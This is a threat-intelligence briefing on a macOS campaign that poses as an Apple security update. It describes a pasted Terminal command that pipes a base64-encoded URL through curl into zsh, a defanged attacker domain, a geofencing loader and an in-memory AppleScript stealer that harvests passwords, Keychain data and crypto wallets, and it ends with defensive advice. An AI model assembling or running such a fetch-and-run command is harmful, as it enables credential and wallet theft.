A currently circulating macOS attack dresses up an infostealer as an Apple security update and relies entirely on the victim to install it. The lure page, styled to look like an official "Download for macOS" prompt and often paired with an AI-generated how-to video, tells visitors to copy a single line into the Terminal app to finish a "macOS security update." Running it hands attackers a foothold to steal browser data, passwords, and cryptocurrency wallet files.
One pasted command, two hidden steps
The command opens with a harmless looking echo that prints "Downloading Update" next to a genuine support[.]apple[.]com address, which is pure misdirection. The part that matters pipes a base64-encoded web address into curl and feeds the result straight to the zsh shell. Decoded, that address points at the attacker's loader script on a throwaway domain (in this sample, lapidorseposoalovbs2[.]com). Nothing is ever downloaded from Apple; the only real action is fetching and running attacker code.
It deliberately spares Russian-speaking machines
The loader's first move is a geofencing check. It reads the Mac's keyboard input sources from the system preferences file and, if it finds a Russian layout, reports a "cis_blocked" event to its server and quietly exits without infecting the machine. A kill-switch that spares systems in Russia and the wider Commonwealth of Independent States is a common tell of criminal operators based in that region. On every other machine the loader fingerprints the host, collecting the external IP address, hostname, macOS version, and locale, then beacons a "loader_requested" event and pulls down the next stage.
An in-memory AppleScript stealer
The final stage is an AppleScript payload fetched from the same server and executed through macOS's built-in osascript interpreter, so nothing is written to disk for antivirus to scan. Microsoft and other vendors have documented this exact chain throughout 2026 (it is tracked under family names such as SHub), in which the AppleScript stealer raises fake system password prompts and sweeps browsers, the Keychain, messaging apps, and wallet files into a compressed archive for exfiltration. It is the same playbook behind other recent fake Mac installer campaigns and AppleScript-based wallet stealers, repackaged with a fresh lure and domain.
How to stay safe
Apple never asks you to paste a Terminal command to install an update; real updates arrive through System Settings. Treat any website, popup, or video that tells you to open Terminal and run a command as hostile, however polished it looks. If you or someone you support ran this, assume browser passwords, session cookies, and any cryptocurrency wallets on the machine are compromised: change those passwords from a clean device and move wallet funds using a different, trusted computer. The original technical breakdown of this campaign family is in Microsoft's research.
This briefing is provided by IntelFusions for informational and defensive purposes only. It is based on sources assessed to be reliable at the time of writing, and analytic judgments carry the confidence levels indicated. Indicators of compromise are defanged; re-arm them only in controlled environments. IntelFusions is not affiliated with the organizations named and makes no warranty as to completeness or accuracy.